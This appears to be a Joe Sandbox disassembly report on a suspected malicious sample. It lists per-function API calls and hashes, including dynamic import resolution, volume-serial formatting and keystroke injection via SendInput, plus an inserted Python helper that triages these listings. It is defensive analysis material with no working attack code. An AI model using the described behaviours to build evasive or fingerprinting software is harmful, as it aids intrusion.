• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$Enable$Show$MessageMoveSend
• String ID:
• API String ID: 896007046-0
• Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
• Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
• Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
• Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
• GetWindowLongW.USER32(?,000000F0), ref: 00441452
• GetWindowLongW.USER32(?,000000F0), ref: 00441493
• SendMessageW.USER32(02FA1BE8,000000F1,00000000,00000000), ref: 004414C6
• SendMessageW.USER32(02FA1BE8,000000F1,00000001,00000000), ref: 004414F1
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
• Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
• Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
• Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
APIs
• _memset.LIBCMT ref: 004484C4
• GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
• IsMenu.USER32(?), ref: 0044857B
• InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
• DrawMenuBar.USER32 ref: 004485E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
• Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
• Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
• Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
APIs
• InterlockedIncrement.KERNEL32 ref: 0047247C
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
• Sleep.KERNEL32(0000000A), ref: 00472499
• InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: 0vH
• API String ID: 327565842-3662162768
• Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
• Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
• Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
• Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
• GetFocus.USER32 ref: 00448B1C
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$Enable$Show$FocusMessageSend
• String ID:
• API String ID: 3429747543-0
• Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
• Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
• Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
• Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D32F
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
• __swprintf.LIBCMT ref: 0045D3CC
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$HH
• API String ID: 3164766367-3924996404
• Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
• Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
• Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
• Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend
• String ID: Msctls_Progress32
• API String ID: 3850602802-3636473452
• Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
• Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
• Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
• Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
APIs
• ___set_flsgetvalue.LIBCMT ref: 00415737
• __calloc_crt.LIBCMT ref: 00415743
• __getptd.LIBCMT ref: 00415750
• CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
• __dosmaperr.LIBCMT ref: 004157A9
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
• String ID:
• API String ID: 1269668773-0
• Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
• Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
• Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
• Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
APIs
  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
  • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
• GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
• GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
• CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
• Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
• Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
• Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
APIs
• ___set_flsgetvalue.LIBCMT ref: 00415690
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 0041569B
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004156AD
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
• ExitThread.KERNEL32 ref: 004156BD
• __freefls@4.LIBCMT ref: 004156D9
• __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 4166825349-0
• Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
• Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
• Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
• Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
• API String ID: 2574300362-3261711971
• Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
• Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
• Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
• Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
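The function records above (the SetErrorMode/GetVolumeInformationW/__swprintf block, the Msctls_Progress32 SendMessageW block, the CreateThread blocks and the LoadLibraryA/GetProcAddress block) are easier to work through with a small parser than by eye. The following is an added analyst helper, not Joe Sandbox code and not part of this report: it reads the "APIs" listing format as it appears on this page (one "APIs" header per function, one "• Name.MODULE(args), ref: addr" line per call, with an optional "Part of subcall function" prefix) and flags runtime import resolution (LoadLibrary* followed by GetProcAddress, the evidence behind the "dynamically determine API calls" signature), a volume serial number being formatted into a string, SetErrorMode(SEM_FAILCRITICALERRORS), thread creation, and progress-bar messages decoded from their commctrl.h constants. The line format, the message constants and the sample listing (constructed from call lines copied off this page) are assumptions of the example.

```python
"""Parse Joe Sandbox "APIs" call listings and triage each function record.

Added analyst helper; not Joe Sandbox code. The listing format below is
inferred from the report text on this page, and the sample listing is
constructed from call lines copied off it.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One call line. Accepts the "Part of subcall function XXXXXXXX:" prefix, calls
# without an argument list (e.g. "__swprintf.LIBCMT ref: ...") and names with '@'.
CALL_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Progress-bar messages from commctrl.h (WM_USER = 0x400, CCM_FIRST = 0x2000).
PBM_NAMES = {0x401: "PBM_SETRANGE", 0x402: "PBM_SETPOS", 0x404: "PBM_SETSTEP",
             0x409: "PBM_SETBARCOLOR", 0x2001: "PBM_SETBKCOLOR"}
SEM_FAILCRITICALERRORS = 0x0001  # suppresses "no disk" dialogs around volume queries

# Constructed sample: call lines copied from this report, in its own layout.
SAMPLE_LISTING = """\
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D32F
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
• __swprintf.LIBCMT ref: 0045D3CC
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
APIs
  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
• CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
"""


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)

    def names(self) -> set:
        return {c.name for c in self.calls}


def parse_listing(text: str) -> list:
    """Split the listing into FunctionRecords, one per "APIs" header."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue  # hashes, dump sources and other metadata lines are skipped
        args = [a for a in (m.group("args") or "").split(",") if a]
        current.calls.append(Call(m.group("name"), m.group("module"), args,
                                  m.group("ref"), m.group("sub")))
    return records


def _hex(arg: str) -> Optional[int]:
    """Decode an argument the sandbox resolved to a constant; '?' yields None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def triage(rec: FunctionRecord) -> list:
    """Return human-readable findings for one function record."""
    findings, names = [], rec.names()
    loads = [c for c in rec.calls if c.name.startswith("LoadLibrary")]
    procs = [c for c in rec.calls if c.name == "GetProcAddress"]
    if loads and procs:  # import resolved at runtime instead of through the IAT
        libs = [c.args[0] for c in loads if c.args]
        syms = [c.args[1] for c in procs if len(c.args) > 1]
        findings.append(f"dynamic API resolution: {libs} -> {syms}")
    if any(n.startswith("GetVolumeInformation") for n in names) and any("printf" in n for n in names):
        findings.append("volume serial formatted to string (host fingerprint candidate)")
    for c in rec.calls:
        if c.name == "SetErrorMode" and c.args and _hex(c.args[0]) == SEM_FAILCRITICALERRORS:
            findings.append(f"SetErrorMode(SEM_FAILCRITICALERRORS) at {c.ref}")
        if c.name == "CreateThread":
            findings.append(f"CreateThread at {c.ref}")
        if c.name == "SendMessageW" and len(c.args) >= 4:
            msg, lparam = _hex(c.args[1]), _hex(c.args[3])
            if msg in PBM_NAMES:
                detail = ""
                if msg == 0x401 and lparam is not None:  # lParam = MAKELPARAM(min, max)
                    detail = f"({lparam & 0xFFFF}..{lparam >> 16})"
                findings.append(f"{PBM_NAMES[msg]}{detail} at {c.ref}")
    return findings


if __name__ == "__main__":
    for i, rec in enumerate(parse_listing(SAMPLE_LISTING)):
        print(f"function {i}: {sorted(rec.names())}")
        for finding in triage(rec):
            print("   ", finding)
```

Run it against a whole report saved as text and it will produce one record per "APIs" header; the "Strings", "Memory Dump Source" and hash lines are ignored because they never match the call pattern. The findings are hints for where to look in the disassembly, not verdicts: the same LoadLibraryA/GetProcAddress pair appears in benign installers that resolve RegDeleteKeyExW because it is absent from older advapi32 builds.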
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                    • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                                    • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                    • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                                    APIs
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                                    • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3220332590-0
                                                                                                                                    • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                    • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                                    • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                    • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1612042205-0
                                                                                                                                    • Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                                                                    • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                                                    • Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                                                                    • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                                    • SendInput.USER32 ref: 0044C6E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
